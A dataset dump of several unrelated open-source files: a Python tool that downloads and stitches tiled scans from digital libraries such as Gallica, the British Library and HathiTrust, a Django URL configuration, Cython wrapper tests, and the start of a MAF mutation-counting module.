height = int(json["d"][-1]["h"])
max_level = json["m"]
return IIPMetadata(tile_size, width, height, max_level)
@staticmethod
def from_text(text):
"""
Parses the following text:
```
Max-size:3590 3507
Tile-size:256 256
Resolution-number:5
```
"""
tile_size = None
width = None
height = None
max_level = None
for line in text.split('\n'):
parts = line.split(':')
if parts[0] == "Max-size":
(width, height) = map(int, parts[1].split())
elif parts[0] == "Tile-size":
tile_size = int(parts[1].split()[0])
elif parts[0] == "Resolution-number":
max_level = int(parts[1]) - 1
else:
pass
return IIPMetadata(tile_size, width, height, max_level)
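#For the sample text in the docstring above, from_text() yields
#tile_size=256, width=3590, height=3507, max_level=4.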
def download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename):
policy = TileSewingPolicy.from_image_size(metadata.width, metadata.height, metadata.tile_size)
download_and_sew_tiles(
output_filename,
lambda tile_x, tile_y: requests.Request(
"GET",
fastcgi_url,
#WARN: passing parameters as string in order to send them in urldecoded form
#(iip does not support urlencoded parameters)
params=f"FIF={remote_filename}&JTL={metadata.max_level},{tile_y * policy.tiles_number_x + tile_x}",
),
policy
)
def download_book_from_iip(metadata_url, fastcgi_url, output_folder, files_root):
"""
Downloads book served by IIPImage fastcgi servant.
API is documented here:
http://iipimage.sourceforge.net/documentation/protocol/
"""
metadata = get_json(metadata_url)["pgs"]
print(f"Going to download {len(metadata)} pages")
for page_number, page_metadata in enumerate(metadata):
iip_page_metadata = IIPMetadata.from_json(page_metadata)
remote_filename = os.path.join(files_root, page_metadata["f"])
output_filename = make_output_filename(output_folder, page_number)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page_number:04d}")
continue
else:
print(f"Downloading page #{page_number:04d}")
download_image_from_iip(fastcgi_url, remote_filename, iip_page_metadata, output_filename)
def download_image_from_iiif(base_url, output_filename):
"""
Downloads single image via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
DESIRED_QUALITIES = ["color", "native", "default"]
DESIRED_FORMATS = ["png", "tif", "jpg"]
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
left = tile_size * tile_x
top = tile_size * tile_y
tile_width = min(width - left, tile_size)
tile_height = min(height - top, tile_size)
tile_url = f"{base_url}/{left},{top},{tile_width},{tile_height}/{tile_width},{tile_height}/0/{desired_quality}.{desired_format}"
return tile_url
metadata_url = f"{base_url}/info.json"
metadata = get_json(metadata_url)
if "tiles" in metadata:
# Served by e. g. vatlib servant
tile_size = metadata["tiles"][0]["width"]
else:
# Served by e. g. Gallica servant
tile_size = 1024
width = metadata["width"]
height = metadata["height"]
desired_quality = "default"
desired_format = "jpg"
profile = metadata.get("profile")
	if (profile is not None) and (len(profile) >= 2) and not isinstance(profile, str):
# Profile is not served by Gallica servant, but served by e. g. British Library servant
# Complex condition helps to ignore missing metadata fields, see e. g.:
# https://gallica.bnf.fr/iiif/ark:/12148/btv1b10508435s/f1/info.json
# http://www.digitale-bibliothek-mv.de/viewer/rest/image/PPN880809493/00000001.tif/info.json
if "qualities" in profile[1]:
available_qualities = profile[1]["qualities"]
for quality in DESIRED_QUALITIES:
if quality in available_qualities:
desired_quality = quality
break
else:
raise RuntimeError(f"Can not choose desired image quality. Available qualities: {available_qualities!r}")
if "formats" in profile[1]:
available_formats = profile[1]["formats"]
for format in DESIRED_FORMATS:
if format in available_formats:
desired_format = format
break
else:
raise RuntimeError(f"Can not choose desired image format. Available formats: {available_formats!r}")
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
download_and_sew_tiles(output_filename, UrlMaker(), policy)
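#A tile URL produced by UrlMaker above follows the IIIF Image API scheme
#{region}/{size}/{rotation}/{quality}.{format}, e.g. (hypothetical base_url):
#	https://example.org/iiif/image/0,0,1024,1024/1024,1024/0/default.jpg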
def download_book_from_iiif(manifest_url, output_folder):
"""
Downloads entire book via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
manifest = get_json(manifest_url)
canvases = manifest["sequences"][0]["canvases"]
for page, metadata in enumerate(canvases):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page:04d}")
continue
base_url = metadata["images"][-1]["resource"]["service"]["@id"]
download_image_from_iiif(base_url, output_filename)
MAX_TILE_NUMBER = 100
def guess_tiles_number_x(url_maker):
tiles_number_x = 0
for tiles_number_x in range(MAX_TILE_NUMBER):
probable_url = url_maker(tiles_number_x, 0)
if probable_url is None:
break
		head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_x
def guess_tiles_number_y(url_maker):
tiles_number_y = 0
for tiles_number_y in range(MAX_TILE_NUMBER):
probable_url = url_maker(0, tiles_number_y)
if probable_url is None:
break
head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_y
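#Sketch: both helpers accept any callable taking (tile_x, tile_y), so a probe
#can be wired up with a plain lambda (hypothetical URL pattern):
#	url_maker = lambda x, y: f"https://example.org/tiles/{x}_{y}.jpg"
#	tiles_number_x = guess_tiles_number_x(url_maker)
#	tiles_number_y = guess_tiles_number_y(url_maker)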
###################
#TILE BASED DOWNLOADERS
###################
@opster.command()
def gallica(
id=("", "", "Id of the book to be downloaded (e. g. 'btv1b7200356s')")
):
"""
Downloads book from https://gallica.bnf.fr/
"""
manifest_url = f"https://gallica.bnf.fr/iiif/ark:/12148/{id}/manifest.json"
output_folder = make_output_folder("gallica", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def encyclopedie(
volume=("", "", "Volume to be downloaded (e. g. '24')"),
page=("", "", "Page number to be downloaded (e. g. '247')")
):
"""
Downloads single image from http://enccre.academie-sciences.fr/encyclopedie
"""
volume = int(volume)
page = int(page)
#there is no manifest.json file, slightly modified IIIF protocol is being used by the website
image_list_url = f"http://enccre.academie-sciences.fr/icefront/api/volume/{volume}/imglist"
image_list_metadata = get_json(image_list_url)
image_metadata = image_list_metadata[page]
image_url = f"http://enccre.academie-sciences.fr/digilib/Scaler/IIIF/{image_metadata['image']}"
output_file = f"{page:04d}.bmp"
download_image_from_iiif(image_url, output_file)
@opster.command()
def vatlib(
id=("", "", "Id of the book to be downloaded (e. g. 'MSS_Cappon.203')")
):
"""
Downloads book from http://digi.vatlib.it/
"""
manifest_url = f"http://digi.vatlib.it/iiif/{id}/manifest.json"
output_folder = make_output_folder("vatlib", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def mecklenburgVorpommern(
id=("", "", "Id of the book to be downloaded (e. g. 'PPN880809493')")
):
"""
Downloads book from http://www.digitale-bibliothek-mv.de
"""
# it looks like Mecklenburg-Vorpommern does not use manifest.json
output_folder = make_output_folder("mecklenburg_vorpommern", id)
for page in range(1, 1000):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
continue
try:
base_url = f"http://www.digitale-bibliothek-mv.de/viewer/rest/image/{id}/{page:08d}.tif"
download_image_from_iiif(base_url, output_filename)
except ValueError:
break
@opster.command()
def prlib(
id=("", "", "Book id to be downloaded (e. g. '20596C08-39F0-4E7C-92C3-ABA645C0E20E')"),
secondary_id=("", "", "Secondary id of the book (e. g. '5699092')"),
page=("p", "", "Download specified (zero-based) page only"),
):
"""
Downloads book from https://www.prlib.ru/
"""
metadata_url = f"https://content.prlib.ru/metadata/public/{id}/{secondary_id}/{id}.json"
files_root = f"/var/data/scans/public/{id}/{secondary_id}/"
fastcgi_url = "https://content.prlib.ru/fcgi-bin/iipsrv.fcgi"
output_folder = make_output_folder("prlib", id)
if page:
page = int(page)
output_filename = make_output_filename(output_folder, page)
metadata = get_json(metadata_url)
page_metadata = metadata[page]
remote_filename = os.path.join(files_root, page_metadata["f"])
download_image_from_iip(fastcgi_url, remote_filename, page_metadata, output_filename)
else:
download_book_from_iip(
metadata_url=metadata_url,
fastcgi_url=fastcgi_url,
files_root=files_root,
output_folder=output_folder
)
@opster.command()
def nga(
id=("", "", "Image id to be downloaded (e. g. `49035`)")
):
"""
Downloads single image from https://www.nga.gov
"""
	slashed_image_id = "/".join(id) #will produce "4/9/0/3/5" from "49035"
remote_filename = f"/public/objects/{slashed_image_id}/{id}-primary-0-nativeres.ptif"
	fastcgi_url = "https://media.nga.gov/fastcgi/iipsrv.fcgi"
metadata = IIPMetadata.from_text(
get_text(f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number")
)
download_image_from_iip(
fastcgi_url=fastcgi_url,
remote_filename=remote_filename,
metadata=metadata,
output_filename=f"nga.{id}.bmp"
)
@opster.command()
def hab(
id=("", "", "Image id to be downloaded (e. g. `grafik/uh-4f-47-00192`)")
):
"""
Downloads single image from http://diglib.hab.de and http://kk.haum-bs.de
(both redirect to Virtuelles Kupferstichkabinett website, which is too hard to be typed)
"""
#The site does not use any metadata and simply sends unnecessary requests to backend
	#Using HEAD requests to find the maximum available zoom level and the tile grid size
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://diglib.hab.de/varia/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 10
TILE_SIZE = 256
max_zoom = None
for test_zoom in range(MAX_ZOOM + 1):
if UrlMaker(test_zoom)(0, 0) is not None:
max_zoom = test_zoom
else:
#current zoom is not available - consider previous one to be maximal
break
assert(max_zoom is not None)
print(f"Guessed max_zoom={max_zoom}")
#The site does not use any metadata and simply sends unnecessary requests to backend
#Guessing tiles_number_x, tiles_number_y using HEAD requests with guessed max_zoom
#
#UrlMaker returns None when corresponding tile does not exist
#
#FIXME: one can save some requests using bisection here,
#but python standard library is too poor to have one
url_maker = UrlMaker(max_zoom)
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, TILE_SIZE)
output_filename = make_output_filename(id.replace("/", "."))
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def yaleImage(
id=("", "", "Image id to be downloaded (e. g. `lwlpr11386`)")
):
"""
Downloads image from http://images.library.yale.edu/
"""
class UrlMaker(object):
"""
Similar to UrlMaker from hab() method. Should be deduplicated once
"""
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 5
#FIXME: replace 011000 with computed expression
metadata = ElementTree.fromstring(get_text(f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/ImageProperties.xml"))
width = int(metadata.attrib["WIDTH"])
height = int(metadata.attrib["HEIGHT"])
tile_size = int(metadata.attrib["TILESIZE"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
output_filename = make_output_filename(id)
download_and_sew_tiles(output_filename, UrlMaker(MAX_ZOOM), policy)
@opster.command()
def yaleBook(
id=("", "", "Image id to be downloaded (e. g. `BRBL_Exhibitions/7/1327507/1327507`)")
):
"""
Downloads image from https://brbl-zoom.library.yale.edu
"""
modulo = id[-1]
output_filename = make_output_filename("", id)
remote_filename = f"BRBL_Exhibitions/{modulo}/{id}/{id}.jp2"
fastcgi_url = "https://brbl-zoom.library.yale.edu/fcgi-bin/iipsrv.fcgi"
metadata_url = f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number"
metadata = IIPMetadata.from_text(get_text(metadata_url))
download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename)
@opster.command()
def britishLibraryBook(
id=("", "", "Book id to be downloaded (e. g. `vdc_100026052453`, as it is displayed in the viewer url)")
):
"""
Downloads a book from http://explore.bl.uk
"""
output_folder = make_output_folder("bl", id)
manifest_url = f"https://api.bl.uk/metadata/iiif/ark:/81055/{id}.0x000001/manifest.json"
download_book_from_iiif(manifest_url, output_folder)
class DeepZoomUrlMaker(object):
def __init__(self, base_url, max_zoom, ext="jpg"):
self.base_url = base_url
self.max_zoom = max_zoom
self.ext = ext
def __call__(self, tile_x, tile_y):
return f"{self.base_url}/{self.max_zoom}/{tile_x}_{tile_y}.{self.ext}"
def download_image_from_deepzoom(output_filename, metadata_url, url_maker):
image_metadata = get_xml(metadata_url)
tile_size = int(image_metadata.attrib["TileSize"])
overlap = int(image_metadata.attrib["Overlap"])
	size_metadata = image_metadata[0] # getchildren() was removed from ElementTree in Python 3.9
width = int(size_metadata.attrib["Width"])
height = int(size_metadata.attrib["Height"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
policy.overlap = overlap
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def leidenCollection(
id=("", "", "Image id of the painting to be downloaded(e. g. `js-108-jan_steen-the_fair_at_warmond_files`)")
):
"""
Downloads single image from https://www.theleidencollection.com
"""
MAX_ZOOM = 13
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
return f"https://www.theleidencollection.com/LeidenCollectionSamples/images/{id}_files/{MAX_ZOOM}/{tile_x}_{tile_y}.jpg"
url_maker = UrlMaker()
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size=None, overlap=None)
output_filename = make_output_filename("", id)
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def britishLibraryManuscript(
id=("", "", "Page id of the manuscript to be downloaded (e. g. `add_ms_12531!1_f005r`)")
):
"""
Downloads single manuscript page from http://www.bl.uk/manuscripts/Default.aspx
"""
def parse_id(full_id):
		manuscript_id, _, page_id = full_id.rpartition('_')
return (manuscript_id, page_id)
manuscript_id, page_id = parse_id(id)
#WARN: here and below base_url and metadata_url have common prefix. One might save something
metadata_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}.xml"
output_folder = make_output_folder("bl", manuscript_id)
output_filename = make_output_filename(output_folder, page_id)
MAX_ZOOM = 13
base_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def makAt(
id=("", "", "Id of the image to be downloaded (e. g. `ki-6952-1_1`)")
):
"""
Downloads single image from https://sammlung.mak.at/
"""
metadata_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}.xml"
output_filename = make_output_filename('.', id)
MAX_ZOOM = 11
base_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def uniJena(
id=("", "", "Id of the image to be downloaded, including document id (e. g. `00108217/JLM_1787_H002_0003_a`)")
):
"""
Downloads single image from https://zs.thulb.uni-jena.de
Requires a lot of work though
"""
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
return f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/{self.zoom}/{tile_y}/{tile_x}.jpg"
metadata_url = f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/imageinfo.xml"
metadata = get_xml(metadata_url)
output_filename = make_output_filename("", os.path.basename(id))
width = int(metadata.attrib["width"])
height = int(metadata.attrib["height"])
zoom = int(metadata.attrib["zoomLevel"])
TILE_SIZE = 256
policy = TileSewingPolicy.from_image_size(width, height, TILE_SIZE)
url_maker = UrlMaker(zoom)
download_and_sew_tiles(output_filename, url_maker, policy)
subprocess.check_call([
"convert",
output_filename,
"-crop", f"{width}x{height}+0+0",
output_filename
])
###################
#PAGE BASED DOWNLOADERS
###################
@opster.command()
def locMusdi(
id=("", "", "Id of the book to be downloaded (e. g. `056`)"),
start_from=("", 1, "The number of the first page in the sequence (defaults to 1)")
):
"""
Downloads book from Library of Congress Music/Dance instruction
"""
start_from = int(start_from)
# Some ids are known to be missing
MISSING_IDS = [
"050", "054", "057", "061", "071",
"078", "083", "095", "100", "103",
"106", "111", "116", "120", "135",
"152", "172", "173", "175", "176",
"180", "185", "192", "193", "196",
"206", "223", "231", "232", "234",
"238", "244", "249",
]
MAX_ID = 252
if len(id) != 3:
print("Expected id to have 3 digits. Please, recheck the ID.")
sys.exit(1)
if id in MISSING_IDS:
print(f"The book with id musdi.{id} is known to be missing. Please, recheck the ID.")
sys.exit(1)
if int(id) > MAX_ID:
print(f"The maximum id is musdi.{MAX_ID}. Please, recheck the ID.")
sys.exit(1)
output_folder = make_output_folder("locMusdi", id)
for page in range(start_from, 1000):
base_url = f"https://memory.loc.gov/music/musdi/{id}/{page:04d}"
url = None
for extension in ["tif", "jpg"]:
output_filename = make_output_filename(output_folder, page, extension=extension)
if os.path.exists(output_filename):
break
maybe_url = base_url + "." + extension
head_response = requests.head(maybe_url)
if head_response.status_code == http.client.OK:
url = maybe_url
break
		if os.path.exists(output_filename):
			print(f"Skip downloading existing page #{page:08d}")
			continue
		if url is None:
			break
print(f"Downloading page #{page:08d}")
get_binary(output_filename, url)
@opster.command()
def hathi(
id=("", "", "Id of the book to be downloaded (e. g. `wu.89005529961`)")
):
"""
Downloads book from http://www.hathitrust.org/
"""
output_folder = make_output_folder("hathi", id)
meta_url = f"https://babel.hathitrust.org/cgi/imgsrv/meta?id={id}"
metadata = get_json(meta_url)
total_pages = metadata["total_items"]
print(f"Going to download {total_pages} pages to {output_folder}")
	for page in range(1, total_pages + 1):
url = f"https://babel.hathitrust.org/cgi/imgsrv/image?id={id};seq={page};width=1000000"
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page {page} to {output_filename}")
get_binary(output_filename, url)
@opster.command()
def vwml(
id=("", "", "Id of the book to be downloaded (e. g. `Wilson1808`)")
):
"""
Downloads book from https://www.vwml.org/topics/historic-dance-and-tune-books
"""
main_url = f"https://www.vwml.org/topics/historic-dance-and-tune-books/{id}"
main_markup = get_text(main_url)
soup = bs4.BeautifulSoup(main_markup, "html.parser")
output_folder = make_output_folder("vwml", id)
for page, thumbnail in enumerate(soup.find_all("img", attrs={"class": "image_thumb"})):
thumbnail_url = thumbnail.attrs["src"]
#IT'S MAGIC!
full_url = thumbnail_url.replace("thumbnails", "web")
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Saving {full_url} to {output_filename}")
try:
get_binary(output_filename, full_url, verify=False)
except ValueError:
#VWML is known to have missing pages listed in this table.
#Ignoring such pages
pass
@opster.command()
def onb(
id=("", "", "Id of the book to be downloaded (e. g. `ABO_+Z178189508`)")
):
"""
Downloads book from http://onb.ac.at/
"""
# First, normalizing id
id = id.replace('/', '_')
if id.startswith("ABO"):
flavour = "OnbViewer"
elif id.startswith("DTL"):
flavour = "RepViewer"
else:
raise RuntimeError(f"Can not determine flavour for {id}")
# Second, obtaining JSESSIONID cookie value
viewer_url = f"http://digital.onb.ac.at/{flavour}/viewer.faces?doc={id}"
viewer_response = requests.get(viewer_url)
cookies = viewer_response.cookies
metadata_url = f"http://digital.onb.ac.at/{flavour}/service/viewer/imageData?doc={id}&from=1&to=1000"
metadata = get_json(metadata_url, cookies=cookies)
output_folder = make_output_folder("onb", id)
image_data = metadata["imageData"]
print(f"Going to download {len(image_data)} images")
for image in image_data:
query_args = image["queryArgs"]
image_id = image["imageID"]
image_url = f"http://digital.onb.ac.at/{flavour}/image?{query_args}&s=1.0&q=100"
output_filename = make_output_filename(output_folder, image_id, extension=None)
if os.path.isfile(output_filename):
print(f"Skip downloading existing image {image_id}")
continue
print(f"Downloading {image_id}")
get_binary(output_filename, image_url, cookies=cookies)
@opster.command()
def staatsBerlin(
id=("", "", "Id of the book to be downloaded (e. g. `PPN86902910X`)")
):
"""
Downloads book from http://digital.staatsbibliothek-berlin.de/
"""
output_folder = make_output_folder("staatsBerlin", id)
page = 1
while True:
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
else:
try:
image_url = f"http://ngcs.staatsbibliothek-berlin.de/?action=metsImage&metsFile={id}&divID=PHYS_{page:04d}"
#WARN:
# it looks like there is no normal way
# to get the number of pages in the book via http request
get_binary(output_filename, image_url)
except ValueError:
print(f"No more images left. Last page was {page - 1:04d}")
break
page += 1
@opster.command()
def polona(
id=("", "", "Base64-encoded id of the book to be downloaded (e. g. `Nzg4NDk0MzY`, can be found in permalink)")
):
"""
Downloads book from https://polona.pl
"""
entity_url = f"https://polona.pl/api/entities/{id}"
entity_metadata = get_json(entity_url)
output_folder = make_output_folder("polona", id)
for page, page_metadata in enumerate(entity_metadata["scans"]):
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
		found = False
		for image_metadata in page_metadata["resources"]:
			if image_metadata["mime"] == "image/jpeg":
				get_binary(output_filename, image_metadata["url"])
				found = True
				break
		if not found:
			raise Exception(f"JPEG file was not found in image_metadata for page {page}")
@opster.command()
def haab(
id=("", "", "Id of the book to be downloaded (e. g. `1286758696_1822000000/EPN_798582804`)")
):
"""
Downloads book from https://haab-digital.klassik-stiftung.de/
"""
def make_url(page):
return f"https://haab-digital.klassik-stiftung.de/viewer/rest/image/{id}_{page:04d}.tif/full/10000,10000/0/default.jpg"
output_folder = make_output_folder("haab", id)
page = 0
	# HAAB server returns 403 for non-existing pages. First, find the number of the starting page.
while True:
page_url = make_url(page)
head_response = requests.head(page_url)
if head_response.status_code == 200:
print(f"Found starting page {page:04d}")
break
page += 1
exception_count = 0
while True:
page_url = make_url(page)
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
page += 1
continue
try:
print(f"Downloading page #{page:08d}")
get_binary(output_filename, page_url)
page += 1
except ValueError as ex:
page += 1
#WARN:
# Certain pages can return 403 even in the middle of the book.
# Skipping certain number of such pages.
exception_count += 1
if exception_count < 10:
print(f"Got ValueError while getting page {page:08d}: {ex}")
continue
else:
print(f"Got exception while getting page {page:08d}: {ex}. Exception limit was reached, downloader will exit now.")
break
if __name__ == "__main__":
opster.dispatch()
|
gpl-3.0
| 1,744,960,985,823,110,000
| 31.074672
| 137
| 0.693922
| false
| 2.857425
| false
| false
| false
|
bczmufrn/frequencia
|
frequencia/urls.py
|
1
|
2221
|
"""frequencia URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.urls import path
from django.conf import settings
from django.contrib import admin
from django.conf.urls import include
from django.conf.urls.static import static
urlpatterns = [
path('', include('frequencia.core.urls', namespace='core')),
path('registro/', include('frequencia.registro.urls', namespace='registro')),
path('vinculos', include('frequencia.vinculos.urls', namespace='vinculos')),
path('calendario/', include('frequencia.calendario.urls', namespace='calendario')),
path('justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
path('relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
path('conta/', include('frequencia.accounts.urls', namespace='accounts')),
path('admin/', admin.site.urls),
]
# urlpatterns = [
# url(r'^', include('frequencia.core.urls', namespace='core')),
# url(r'^registro/', include('frequencia.registro.urls', namespace='registro')),
# url(r'^vinculos/', include('frequencia.vinculos.urls', namespace='vinculos')),
# url(r'^calendario/', include('frequencia.calendario.urls', namespace='calendario')),
# url(r'^justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
# url(r'^relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
# url(r'^admin/', admin.site.urls),
# url(r'^conta/', include('frequencia.accounts.urls', namespace='accounts')),
# ]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
mit
| 7,764,757,986,167,539,000
| 47.304348
| 99
| 0.70869
| false
| 3.354985
| false
| false
| false
|
AlexanderFabisch/cythonwrapper
|
test/test_type_conversions.py
|
1
|
4159
|
import numpy as np
from pywrap.testing import cython_extension_from
from nose.tools import assert_equal, assert_raises
def test_bool_in_bool_out():
with cython_extension_from("boolinboolout.hpp"):
from boolinboolout import A
a = A()
b = False
assert_equal(not b, a.neg(b))
def test_double_in_double_out():
with cython_extension_from("doubleindoubleout.hpp"):
from doubleindoubleout import A
a = A()
d = 3.213
assert_equal(d + 2.0, a.plus2(d))
def test_complex_arg():
with cython_extension_from("complexarg.hpp"):
from complexarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_map():
with cython_extension_from("map.hpp"):
from map import lookup
m = {"test": 0}
assert_equal(lookup(m), 0)
def test_vector():
with cython_extension_from("vector.hpp"):
from vector import A
a = A()
v = np.array([2.0, 1.0, 3.0])
n = a.norm(v)
assert_equal(n, 14.0)
def test_string_in_string_out():
with cython_extension_from("stringinstringout.hpp"):
from stringinstringout import A
a = A()
s = "This is a sentence"
assert_equal(s + ".", a.end(s))
def test_string_vector():
with cython_extension_from("stringvector.hpp"):
from stringvector import A
a = A()
substrings = ["AB", "CD", "EF"]
res = a.concat(substrings)
assert_equal(res, "ABCDEF")
def test_complex_ptr_arg():
with cython_extension_from("complexptrarg.hpp"):
from complexptrarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_factory():
with cython_extension_from("factory.hpp"):
from factory import AFactory
factory = AFactory()
a = factory.make()
assert_equal(5, a.get())
def test_primitive_pointers():
with cython_extension_from("primitivepointers.hpp"):
from primitivepointers import fun1
assert_equal(fun1(5), 6)
def test_cstring():
with cython_extension_from("cstring.hpp"):
from cstring import length, helloworld
assert_equal(length("test"), 4)
assert_equal(helloworld(), "hello world")
def test_fixed_length_array():
with cython_extension_from("fixedarray.hpp"):
from fixedarray import to_string
assert_equal(to_string([1, 2, 3, 4, 5]), "[1, 2, 3, 4, 5]")
assert_raises(ValueError, to_string, [1, 2, 3, 4])
assert_raises(TypeError, to_string, [1, 2, 3, 4, "a"])
def test_missing_default_ctor():
with cython_extension_from("missingdefaultctor.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingdefaultctor")
def test_missing_assignment():
with cython_extension_from("missingassignmentop.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingassignmentop")
def test_exceptions():
# A list of convertible exceptions can be found in the Cython docs:
# http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html#exceptions
with cython_extension_from("throwexception.hpp"):
from throwexception import (throw_bad_alloc, throw_bad_cast,
throw_domain_error, throw_invalid_argument,
throw_ios_base_failure,
throw_out_of_range, throw_overflow_error,
throw_range_error, throw_underflow_error,
throw_other)
assert_raises(MemoryError, throw_bad_alloc)
assert_raises(TypeError, throw_bad_cast)
assert_raises(ValueError, throw_domain_error)
assert_raises(ValueError, throw_invalid_argument)
assert_raises(IOError, throw_ios_base_failure)
assert_raises(IndexError, throw_out_of_range)
assert_raises(OverflowError, throw_overflow_error)
assert_raises(ArithmeticError, throw_range_error)
assert_raises(ArithmeticError, throw_underflow_error)
assert_raises(RuntimeError, throw_other)
|
bsd-3-clause
| -8,130,951,337,650,966,000
| 31.24031
| 79
| 0.613369
| false
| 3.645048
| true
| false
| false
|
kotoroshinoto/TCGA_MAF_Analysis
|
gooch_maf_tools/util/MAFcounters.py
|
1
|
4909
|
import os
import sys
from ..formats import MAF
__author__ = 'mgooch'
class FeatureCounter:
def __init__(self):
self.counts = dict()
self.name = None
def count(self, entry: MAF.Entry):
return 0
def __appendcount__(self, keystring):
if keystring is None:
return
if keystring in self.counts:
self.counts[keystring] += 1
else:
self.counts[keystring] = 1
def __countif__(self, keystring, condition):
if condition:
self.__appendcount__(keystring)
def __str__(self):
str_val = ""
for key in sorted(self.counts.keys()):
str_val += "%s\t%s\n" % (key, self.counts[key])
return str_val
def write_file(self, path, prefix=None):
realpath = os.path.realpath(os.path.relpath(prefix, start=path))
if self.name is not None and len(self.name) > 0:
out_file_name = ""
if prefix is not None and len(prefix) > 0:
out_file_name = os.path.realpath(os.path.relpath("%s_%s.txt" % (prefix, self.name), start=path))
#$ofname=$path.'/'.$prefix.'_'.$self->{name}.".txt";
else:
out_file_name = os.path.realpath(os.path.relpath("%s.txt" % self.name, start=path))
#$ofname=$path.'/'.$self->{name}.".txt";
# print "$ofname\n";
out_file_handler = open(out_file_name, mode='w')
out_file_handler.write("%s" % self)
out_file_handler.close()
else:
print("writeFile used on counter with no name", file=sys.stderr)
sys.exit(-1)
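# Usage sketch (maf_entries is a hypothetical iterable of MAF.Entry objects;
# the counter name must be set before write_file() is called):
#	counter = SampMutCounter()
#	counter.name = "sample_counts"
#	for entry in maf_entries:
#		counter.count(entry)
#	counter.write_file(path=".", prefix="mymaf")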
class GeneMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Hugo_Symbol'])
class LocMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
#count according to GENE_CHROM_START_END
